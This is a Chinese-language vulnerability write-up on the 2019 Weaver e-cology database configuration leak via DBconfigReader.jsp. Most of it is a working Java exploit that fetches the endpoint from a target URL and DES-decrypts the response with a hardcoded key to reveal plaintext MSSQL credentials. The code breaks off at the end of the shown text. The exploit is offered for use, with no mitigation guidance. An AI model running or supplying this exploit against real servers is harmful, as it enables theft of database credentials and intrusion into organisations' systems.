0x00 概述 201910,网上爆出泛微数据库(MSSQL)配置泄露漏洞,攻击者可以通过漏洞页面DBconfigReader.jsp将获取的的内容解密,可得到明文数据库配置。 影响范围包括不限于8.0、9.0版。 0x01 漏洞重现 利用ecologyexp.jar package com; import org.apache.http.HttpEntity; import org.apache.http.client.methods.CloseableHttpResponse; import org.apache.http.client.methods.HttpGet; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.client.HttpClientBuilder; import org.apache.http.util.EntityUtils; import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.DESKeySpec; import java.security.SecureRandom; public class ReadDbConfig { private final static String DES = “DES”; private final static String key = “1z2x3c4v5b6n”; public static void main(String[] args) throws Exception { if(args[0]!=null&& args[0].length() !=0){ String url = args[0]+”/mobile/DBconfigReader.jsp”; System.out.println(ReadConfig(url)); }else{ System.err.print(“use: java -jar ecologyExp http://127.0.0.1”); } } private static String ReadConfig(String url) throws Exception { CloseableHttpClient httpClient = HttpClientBuilder.create().build(); HttpGet httpGet = new HttpGet(url); CloseableHttpResponse response = httpClient.execute(httpGet); HttpEntity responseEntity = response.getEntity(); byte[] res1 = EntityUtils.toByteArray(responseEntity); byte[] data = subBytes(res1,10,res1.length-10); byte [] finaldata =decrypt(data,key.getBytes()); return (new String(finaldata)); } private static byte[] decrypt(byte[] data, byte[] key) throws Exception { SecureRandom sr = new SecureRandom(); DESKeySpec dks = new DESKeySpec(key); SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(DES); SecretKey securekey = keyFactory.generateSecret(dks); Cipher cipher = Cipher.getInstance(DES); cipher.init(Cipher.DECRYPT_MODE, securekey, sr); return cipher.doFinal(data); } public static byte[]……